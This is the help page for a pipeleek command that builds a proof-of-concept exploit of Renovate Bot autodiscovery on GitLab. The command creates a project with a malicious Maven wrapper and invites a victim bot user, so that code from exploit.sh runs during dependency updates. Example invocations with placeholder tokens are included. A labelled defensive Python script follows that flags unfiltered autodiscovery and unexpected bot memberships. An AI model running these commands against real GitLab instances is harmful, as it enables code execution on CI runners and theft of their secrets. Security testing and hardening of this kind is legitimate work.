Autodiscovery

pipeleek gl renovate autodiscovery

Create a PoC for exploiting Renovate Autodiscovery misconfigurations

Synopsis

Create a project with a Renovate Bot configuration that will be picked up by an existing Renovate Bot user. During dependency updates, the Renovate Bot will execute the project's malicious Maven wrapper script. The script's payload can be customized in exploit.sh.

pipeleek gl renovate autodiscovery [flags]

Examples

# Create a project and invite the victim Renovate Bot user to it. Uses the Maven wrapper to execute arbitrary code during dependency updates.
pipeleek gl renovate autodiscovery --token glpat-xxxxxxxxxxx --url https://gitlab.mydomain.com --project-name my-exploit-project --username renovate-bot-user

# Create a project with a CI/CD pipeline for local testing (requires setting RENOVATE_TOKEN as CI/CD variable)
pipeleek gl renovate autodiscovery --token glpat-xxxxxxxxxxx --url https://gitlab.mydomain.com --project-name my-exploit-project --add-renovate-cicd-for-debugging

Options

      --add-renovate-cicd-for-debugging   Creates a .gitlab-ci.yml file in the repo that runs Renovate Bot for local testing
  -h, --help                              help for autodiscovery
  -p, --project-name string               The name for the created project
  -n, --username string                   The username of the victim Renovate Bot user to invite

Options inherited from parent commands

      --color              Enable colored log output (auto-disabled when using --logfile) (default true)
      --config string      Config file path. Example: ~/.config/pipeleek/pipeleek.yaml
      --ignore-proxy       Ignore HTTP_PROXY environment variable
      --json               Use JSON as log output format
      --log-level string   Set log level globally (debug, info, warn, error). Example: --log-level=warn
  -l, --logfile string     Log output to a file
  -t, --token string       GitLab API Token
  -u, --url string         GitLab instance URL
  -v, --verbose            Enable debug logging (shortcut for --log-level=debug)
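
Defender-side check for the condition described in the Synopsis, as an added example that is not part of pipeleek or Renovate: it flags a self-hosted Renovate config that enables autodiscovery without a filter, and lists bot memberships that fall outside the namespaces the bot is meant to serve. The config, the project list, the `jdoe` namespace and the `ALLOWED` allowlist are constructed sample data, and the glob matcher is a simplified approximation of Renovate's own matching.

```python
import json
import re

# Constructed sample of a self-hosted Renovate config. "autodiscover" and
# "autodiscoverFilter" are Renovate options; the values here are made up.
RENOVATE_CONFIG = json.loads('{"platform": "gitlab", "autodiscover": true}')

# Constructed sample of the bot account's project memberships, shaped like
# the response of GitLab's GET /projects?membership=true (one field kept).
BOT_PROJECTS = json.loads("""[
  {"path_with_namespace": "platform/billing-api"},
  {"path_with_namespace": "platform/libs/auth"},
  {"path_with_namespace": "jdoe/my-exploit-project"}
]""")

ALLOWED = ["platform/**"]  # hypothetical namespaces the bot should serve


def glob_to_regex(pattern):
    """Simplified glob (an approximation): '**' crosses '/', '*' does not."""
    conv = {"**": ".*", "*": "[^/]*"}
    parts = re.split(r"(\*\*|\*)", pattern)
    return re.compile("".join(conv.get(p, re.escape(p)) for p in parts) + r"\Z")


def config_findings(cfg):
    """Flag autodiscovery that is enabled with no filter restricting it."""
    if cfg.get("autodiscover") and not cfg.get("autodiscoverFilter"):
        return ["autodiscover enabled without autodiscoverFilter"]
    return []


def unexpected_projects(projects, allowed):
    """Return memberships whose path matches none of the allowed patterns."""
    rules = [glob_to_regex(p) for p in allowed]
    paths = [p["path_with_namespace"] for p in projects]
    return [path for path in paths if not any(r.match(path) for r in rules)]


if __name__ == "__main__":
    for finding in config_findings(RENOVATE_CONFIG):
        print("CONFIG:", finding)
    for path in unexpected_projects(BOT_PROJECTS, ALLOWED):
        print("UNEXPECTED MEMBERSHIP:", path)
```

Setting `autodiscoverFilter` to the namespaces the bot is meant to serve clears the first finding; any membership reported by the second check is a project the bot was invited to from outside those namespaces.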

SEE ALSO